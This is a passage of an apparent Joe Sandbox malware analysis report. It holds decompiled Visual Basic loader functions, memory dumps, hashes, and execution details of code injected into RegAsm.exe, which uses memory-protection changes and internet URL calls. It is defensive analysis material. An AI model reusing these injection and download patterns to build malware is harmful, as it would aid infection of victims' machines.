__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E50,000000F0,?,?,?,?,?,?,?,?,?,?,?), ref: 00415CE7
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 00415D05
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 00415D0D
__vbaFreeStr.MSVBVM60(00415D43,?,?,?,?,?,?,?,?,?,?,?), ref: 00415D35
__vbaFreeStr.MSVBVM60(00415D43,?,?,?,?,?,?,?,?,?,?,?), ref: 00415D3D

Strings

`sA, xrefs: 00415C70

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$Free$CheckHresult$New2$#562#569#571#592ChkstkCopyMove
String ID: `sA
API String ID: 4001052931-2992589057
Opcode ID: c835d74dd2a565bbcb0b8ca920c091a2cb403c67c5ca7d8d48287734e6d68ba2
Instruction ID: c268f3f382a54fb3f1a124f4294aa6cb02f91f1646405e0a86c9508209c18728
Opcode Fuzzy Hash: c835d74dd2a565bbcb0b8ca920c091a2cb403c67c5ca7d8d48287734e6d68ba2
Instruction Fuzzy Hash: 9761E574900649EFDF10EFE1C885BEDBBB4BF48704F10452AE402BB2A5D7789A85DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415503, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E00415503(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				intOrPtr _v32;
				short _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				void* _v76;
				char _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				short _v100;
				intOrPtr* _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				short _t91;
				char* _t95;
				signed int _t98;
				signed int _t104;
				signed int _t109;
				short _t113;
				char* _t117;
				signed int _t121;
				short _t122;
				void* _t136;
				void* _t138;
				intOrPtr _t139;

				_t139 = _t138 - 0xc;
				 *[fs:0x0] = _t139;
				L00401310();
				_v16 = _t139;
				_v12 = 0x401290;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x401316, _t136);
				_v48 = 0x80020004;
				_v56 = 0xa;
				_t91 =  &_v56;
				_push(_t91);
				L004013D0();
				_v36 = _t91;
				L0040152C();
				if( *0x417010 != 0) {
					_v112 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v112 = 0x417010;
				}
				_t95 =  &_v40;
				L004014A8();
				_v84 = _t95;
				_t98 =  *((intOrPtr*)( *_v84 + 0x1a8))(_v84, _t95,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x310))( *_v112));
				asm("fclex");
				_v88 = _t98;
				if(_v88 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x403cdc);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v116 = _t98;
				}
				L00401562();
				if( *0x417360 != 0) {
					_v120 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v120 = 0x417360;
				}
				_t32 =  &_v120; // 0x417360
				_v84 =  *((intOrPtr*)( *_t32));
				_t104 =  *((intOrPtr*)( *_v84 + 0x4c))(_v84,  &_v40);
				asm("fclex");
				_v88 = _t104;
				if(_v88 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x403c24);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v124 = _t104;
				}
				_v92 = _v40;
				_t109 =  *((intOrPtr*)( *_v92 + 0x20))(_v92,  &_v80);
				asm("fclex");
				_v96 = _t109;
				if(_v96 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x20);
					_push(0x403f10);
					_push(_v92);
					_push(_v96);
					L00401574();
					_v128 = _t109;
				}
				_v100 =  ~(0 | _v80 != 0x00000000);
				L00401562();
				_t113 = _v100;
				if(_t113 != 0) {
					_push(0xe1);
					L00401424();
					_v32 = _t113;
				}
				if( *0x417010 != 0) {
					_v132 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v132 = 0x417010;
				}
				_t117 =  &_v40;
				L004014A8();
				_v84 = _t117;
				_t121 =  *((intOrPtr*)( *_v84 + 0x158))(_v84,  &_v76, _t117,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v88 = _t121;
				if(_v88 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x403cfc);
					_push(_v84);
					_push(_v88);
					L00401574();
					_v136 = _t121;
				}
				_t122 = _v76;
				_v28 = _t122;
				L00401562();
				_push(0x41576b);
				return _t122;
			}

0x00415506
0x00415515
0x0041551f
0x00415527
0x0041552a
0x00415531
0x00415540
0x00415543
0x0041554a
0x00415551
0x00415554
0x00415555
0x0041555a
0x00415561
0x0041556d
0x00415587
0x0041556f
0x0041556f
0x00415574
0x00415579
0x0041557e
0x0041557e
0x004155a2
0x004155a6
0x004155ab
0x004155b6
0x004155bc
0x004155be
0x004155c5
0x004155e1
0x004155c7
0x004155c7
0x004155cc
0x004155d1
0x004155d4
0x004155d7
0x004155dc
0x004155dc
0x004155e8
0x004155f4
0x0041560e
0x004155f6
0x004155f6
0x004155fb
0x00415600
0x00415605
0x00415605
0x00415615
0x0041561a
0x00415629
0x0041562c
0x0041562e
0x00415635
0x0041564e
0x00415637
0x00415637
0x00415639
0x0041563e
0x00415641
0x00415644
0x00415649
0x00415649
0x00415655
0x00415664
0x00415667
0x00415669
0x00415670
0x00415689
0x00415672
0x00415672
0x00415674
0x00415679
0x0041567c
0x0041567f
0x00415684
0x00415684
0x00415698
0x0041569f
0x004156a4
0x004156aa
0x004156ac
0x004156b1
0x004156b6
0x004156b6
0x004156c0
0x004156da
0x004156c2
0x004156c2
0x004156c7
0x004156cc
0x004156d1
0x004156d1
0x004156f5
0x004156f9
0x004156fe
0x0041570d
0x00415713
0x00415715
0x0041571c
0x0041573b
0x0041571e
0x0041571e
0x00415723
0x00415728
0x0041572b
0x0041572e
0x00415733
0x00415733
0x00415742
0x00415746
0x0041574d
0x00415752
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 0041551F
#648.MSVBVM60(0000000A), ref: 00415555
__vbaFreeVar.MSVBVM60(0000000A), ref: 00415561
__vbaNew2.MSVBVM60(00404410,00417010,0000000A), ref: 00415579
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004155A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000001A8), ref: 004155D7
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004155E8
__vbaNew2.MSVBVM60(00403C34,00417360,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 00415600
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000004C), ref: 00415644
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F10,00000020), ref: 0041567F
__vbaFreeObj.MSVBVM60(00000000,?,00403F10,00000020), ref: 0041569F
#569.MSVBVM60(000000E1), ref: 004156B1
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004156CC
__vbaObjSet.MSVBVM60(?,00000000), ref: 004156F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000158), ref: 0041572E
__vbaFreeObj.MSVBVM60(00000000,?,00403CFC,00000158), ref: 0041574D

Strings

`sA, xrefs: 00415615

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2$#569#648Chkstk
String ID: `sA
API String ID: 1323330470-2992589057
Opcode ID: 1b8315087c5b42ccd0ca5bf80c0e777bd42e61b0ab7f281ca75f0d243296d8b1
Instruction ID: f4b6abb2adfb7fdc9b9515fdfe466dbf0538b24e09d08be1f7bade0e2a76f4d3
Opcode Fuzzy Hash: 1b8315087c5b42ccd0ca5bf80c0e777bd42e61b0ab7f281ca75f0d243296d8b1
Instruction Fuzzy Hash: B471F370A00208EFDB00DFE1C94ABDDBBB5BF48704F20446AE002BB2A5D7799984DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041146A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 55%

			E0041146A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr* _v28;
				signed int _v32;
				char _v40;
				signed int _v44;
				char* _t24;
				signed int _t27;
				intOrPtr _t35;

				_push(0x401316);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t35;
				_push(0x18);
				L00401310();
				_v12 = _t35;
				_v8 = 0x4011b0;
				if( *0x417360 != 0) {
					_v40 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v40 = 0x417360;
				}
				_t5 =  &_v40; // 0x417360
				_v28 =  *((intOrPtr*)( *_t5));
				_t24 =  &_v24;
				L00401568();
				_t27 =  *((intOrPtr*)( *_v28 + 0x10))(_v28, _t24, _t24, _a4);
				asm("fclex");
				_v32 = _t27;
				if(_v32 >= 0) {
					_v44 = _v44 & 0x00000000;
				} else {
					_push(0x10);
					_push(0x403c24);
					_push(_v28);
					_push(_v32);
					L00401574();
					_v44 = _t27;
				}
				L00401562();
				_push(0x41151e);
				return _t27;
			}

0x0041146f
0x0041147a
0x0041147b
0x00411482
0x00411485
0x0041148d
0x00411490
0x0041149e
0x004114b8
0x004114a0
0x004114a0
0x004114a5
0x004114aa
0x004114af
0x004114af
0x004114bf
0x004114c4
0x004114ca
0x004114ce
0x004114dc
0x004114df
0x004114e1
0x004114e8
0x00411501
0x004114ea
0x004114ea
0x004114ec
0x004114f1
0x004114f4
0x004114f7
0x004114fc
0x004114fc
0x00411508
0x0041150d
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00411485
__vbaNew2.MSVBVM60(00403C34,00417360,?,?,?,?,00401316), ref: 004114AA
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,?,?,00401316), ref: 004114CE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000010,?,?,?,?,?,?,00401316), ref: 004114F7
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401316), ref: 00411508

Strings

`sA, xrefs: 004114BF

Memory Dump Source

Source File: 0000000C.00000002.420603886.0000000000411000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.420579967.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.420585928.0000000000401000.00000020.00020000.sdmp Download File
Associated: 0000000C.00000002.420619483.0000000000417000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.420630488.0000000000419000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_ota.jbxd

Similarity

API ID: __vba$AddrefCheckChkstkFreeHresultNew2
String ID: `sA
API String ID: 3149954519-2992589057
Opcode ID: dc7d13b1599e789d4edf1927af25ab55c797e543dfa95a468e5cd086184aeb60
Instruction ID: d5f192d199f4e5fb9b1886249f8700beed434b5717bc5ec84f499b056d77a90b
Opcode Fuzzy Hash: dc7d13b1599e789d4edf1927af25ab55c797e543dfa95a468e5cd086184aeb60
Instruction Fuzzy Hash: 3B111C7094020DAFDB00DF91C846FEEBBB9FB48745F10402AF502B72A0C3795A80DBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 1048 Parent PID: 4900 RegAsm.exeCOMMON

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	71.5%
Signature Coverage:	0%
Total number of Nodes:	186
Total number of Limit Nodes:	14

Executed Functions

Function 00946032, Relevance: 1.7, APIs: 1, Instructions: 221
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00945C6C,00000040,009422E1,00000000,00000000), ref: 00946061

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6d4aad02c9fc242d3edd54f53d7b06c7bac1d123be80e5dc7f6a9f44e7b2371b
Instruction ID: ad8ae918a3829f12c77fb0789c3a96332a4075f5bf6a3fec59794ec156762ddf
Opcode Fuzzy Hash: 6d4aad02c9fc242d3edd54f53d7b06c7bac1d123be80e5dc7f6a9f44e7b2371b
Instruction Fuzzy Hash: F74119A225C6806FE309D624CC99F363BBDEBD7715B18419FE0C2C71A3E164EC468721

Uniqueness

Uniqueness Score: -1.00%

Function 009460AF, Relevance: 1.7, APIs: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cffd69884bb7acb1885fb78d0f3686b66c64a21ee148af4025a9f52ff86610da
Instruction ID: ddafc5ab80d65a2c5e8f72f6592b5a0ccef56e0086408f0b67539e712026da2f
Opcode Fuzzy Hash: cffd69884bb7acb1885fb78d0f3686b66c64a21ee148af4025a9f52ff86610da
Instruction Fuzzy Hash: B631D3A221DA948FC706D72889A1E653FB5EFA7321B6941DBC0C1CB1A3D558DC4A8722

Uniqueness

Uniqueness Score: -1.00%

Function 00945DFF, Relevance: 1.7, APIs: 1, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ebdde05dfd3d6249963b4f080754663618993c42e8f341b1b455697f3d8c1b
Instruction ID: 8b7fc625f17046c5cbd4888aaeaad25ed3bc915dce1b4454efc45717dd48dcd7
Opcode Fuzzy Hash: 65ebdde05dfd3d6249963b4f080754663618993c42e8f341b1b455697f3d8c1b
Instruction Fuzzy Hash: A7419D31D04F00AFDF348AE488C9F69B794FF62321F6A4699C6924B1C7D3298986C613

Uniqueness

Uniqueness Score: -1.00%

Function 00946048, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00945C6C,00000040,009422E1,00000000,00000000), ref: 00946061

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00943457, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00943AA9,00000000,00000000,00000000,00000000), ref: 0094346B
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0094352E

Strings

61, xrefs: 00943528

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: InternetOpen
String ID: 61
API String ID: 2038078732-4179516829
Opcode ID: ea40b8359ad1b2f95f6fd860132d97378338cd9f2411d0df0ce2adba6225a47c
Instruction ID: 52a45e105b09eaba9684cb8b8a80b92d21a659901085ae0aa5f160c5c409f6f0
Opcode Fuzzy Hash: ea40b8359ad1b2f95f6fd860132d97378338cd9f2411d0df0ce2adba6225a47c
Instruction Fuzzy Hash: B941C470244387AEEB319E20CD56FFE3679EF41380F10C825FD4EAA590E776DA44AA11

Uniqueness

Uniqueness Score: -1.00%

Function 009434E1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0094352E

Strings

61, xrefs: 00943528

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: InternetOpen
String ID: 61
API String ID: 2038078732-4179516829
Opcode ID: 731b7737793b9aa8e175d338cb2d81efee54d492b8a6fd85c27b441af90a62a7
Instruction ID: 5825fae57cb02fbce3cee9a548bb600649e21831e08fe45b9f93809fa658357d
Opcode Fuzzy Hash: 731b7737793b9aa8e175d338cb2d81efee54d492b8a6fd85c27b441af90a62a7
Instruction Fuzzy Hash: 4031CC706093C6DFDB328E30CD56BE93BB4EF02350F158466ED89CA482F6359A54DB12

Uniqueness

Uniqueness Score: -1.00%

Function 00943008, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C:\Program Files\qga\qga.exe, xrefs: 009430E9

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID:
String ID: C:\Program Files\qga\qga.exe
API String ID: 0-182997636
Opcode ID: 6d616f9f09d57bf89b0d30bafecd52c9330131c2205cdf84c41b32abd868e271
Instruction ID: fe451e4bf1e1af439f2f97131d8027e947704af5148fcfc3743b1893773c6c93
Opcode Fuzzy Hash: 6d616f9f09d57bf89b0d30bafecd52c9330131c2205cdf84c41b32abd868e271
Instruction Fuzzy Hash: 5A11AB3180C6858ECB2667344C57FA87F717F16323FA8CBC6E0D24B093D21A4A698756

Uniqueness

Uniqueness Score: -1.00%

Function 009434AE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 0094352E

Strings

61, xrefs: 00943528

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: InternetOpen
String ID: 61
API String ID: 2038078732-4179516829
Opcode ID: c07e9787f902e8b66c54cb079bfa43b4b56e89536942292f53ca4f69b58967e1
Instruction ID: 009f052d4cf5ed2d3e1568d8c95931f80d0d4994fa5d49869a8db391306ca613
Opcode Fuzzy Hash: c07e9787f902e8b66c54cb079bfa43b4b56e89536942292f53ca4f69b58967e1
Instruction Fuzzy Hash: B1219570244347AEEB358E24CE55FFE37A9AF41380F158435FD4E9A541E735DA40EA11

Uniqueness

Uniqueness Score: -1.00%

Function 1D40BDE8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1D40BE72

Strings

U, xrefs: 1D40BDF5

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: EncodePointer
String ID: U
API String ID: 2118026453-3372436214
Opcode ID: ebaa6b2923830020edd31e168031bc9e0a59244c2941e9655d4d9e606a9a3dac
Instruction ID: 52c5a4eb782d252e99f0cad902927645578767bc56833bfc3aa2b138568e9585
Opcode Fuzzy Hash: ebaa6b2923830020edd31e168031bc9e0a59244c2941e9655d4d9e606a9a3dac
Instruction Fuzzy Hash: 882165719017468FDB10CFA4C88479EBBF4FB0A325F20842ADA09A7601D33A6414CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D403C6F, Relevance: 1.7, APIs: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D4052A2

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6beaa0d59762c52b99a7dd64e2a25715518787888eab19f78a1d41e5e6b9faec
Instruction ID: 9d955f74e699d7a4b7d6ce2e6236c29bb57efcb9dbe80d89d79616963dcf592b
Opcode Fuzzy Hash: 6beaa0d59762c52b99a7dd64e2a25715518787888eab19f78a1d41e5e6b9faec
Instruction Fuzzy Hash: EC710FB1D007499FDB10CFA9C884ADEBBB5FF48314F60852AE819AB311D775A845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D405130, Relevance: 1.7, APIs: 1, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D4052A2

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6147c34ec5888125326a81fc051779582f67bdb29a9fdbe5c95dbbf3e918edd1
Instruction ID: dca53949b291e405d2457b6c9fe04ec7a05d6dade0d2fe78a5158086139a6d86
Opcode Fuzzy Hash: 6147c34ec5888125326a81fc051779582f67bdb29a9fdbe5c95dbbf3e918edd1
Instruction Fuzzy Hash: DE6102B1C00249AFDF01CFA9C880ADEBFB1FF49314F14816AE919AB221C775A855CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00946546, Relevance: 1.6, APIs: 1, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e1c8b52ab60ea0c480f008180d847972117fbb60c01494c97a029091f515ced9
Instruction ID: 7cedb82babc2e6e444758db4df65f0a517ff348afebb61a7b10740ccd9fa953d
Opcode Fuzzy Hash: e1c8b52ab60ea0c480f008180d847972117fbb60c01494c97a029091f515ced9
Instruction Fuzzy Hash: FE4124F1A08609CEDF345E108858FF877B1BF53325F6A0A6AD85207254D33998C4DB83

Uniqueness

Uniqueness Score: -1.00%

Function 00944B7E, Relevance: 1.6, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099298e30f8eff466f98cd1f5349cd006a6254cc69d2c3d6a01007ee8b6367f7
Instruction ID: 59aa52337a8b019960d9e59828f0e7d21686cd0ce3598aaa44d504cc990efc83
Opcode Fuzzy Hash: 099298e30f8eff466f98cd1f5349cd006a6254cc69d2c3d6a01007ee8b6367f7
Instruction Fuzzy Hash: EC410174A4421ADFCF24AE548AD0FFD23A8EE54311B754D2AEC8797241D278E884B682

Uniqueness

Uniqueness Score: -1.00%

Function 00941F34, Relevance: 1.6, APIs: 1, Instructions: 147
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00941F4A

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 740ff14ebd5326ee9ee01f5d15e24c3bc21950fe8197c14106e4f8f677567c39
Instruction ID: 14ce755dd0e8b3b7db41e6df5618b6f3d13efe847f6cacdc16a7ec0f82a97e6c
Opcode Fuzzy Hash: 740ff14ebd5326ee9ee01f5d15e24c3bc21950fe8197c14106e4f8f677567c39
Instruction Fuzzy Hash: 6841BDB1108301EFD7018F34CC86FA4B7A4FF0A361F614691E8A2871A2C379C9CACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00946598, Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0ce4c078b2e38afcddbc9a14c662dbc71e07e6bb529d01935bddefcdb82c47b1
Instruction ID: a67d0389a29beade9eccae306eb4521981965cc6c55d65dede742a54501a2542
Opcode Fuzzy Hash: 0ce4c078b2e38afcddbc9a14c662dbc71e07e6bb529d01935bddefcdb82c47b1
Instruction Fuzzy Hash: 6D4106F1E08709DEDF258E108819FA07BA1BF1332AF7E0A9AC94207151E32D98D49B43

Uniqueness

Uniqueness Score: -1.00%

Function 00946511, Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?), ref: 009467DC

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3d435fce266efd111c92eb0692f45f4184d15cd650e0b7b09583f31c1d1ea774
Instruction ID: 45b693eb61fc3b2994a86bab5968ce346a94011d4bd03d9f65e83a6cd20d1820
Opcode Fuzzy Hash: 3d435fce266efd111c92eb0692f45f4184d15cd650e0b7b09583f31c1d1ea774
Instruction Fuzzy Hash: DD31B8F1A08305CEEF3959148958FF427A1AF57318F754A2ADC0346594E33C98C89743

Uniqueness

Uniqueness Score: -1.00%

Function 1D403C7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D4052A2

Memory Dump Source

Source File: 0000000E.00000002.576933240.000000001D400000.00000040.00000001.sdmp, Offset: 1D400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d400000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 717ef74fb83bd1fe42c4f177f300345dce4a9d4e887c3e7854b5c674193d0360
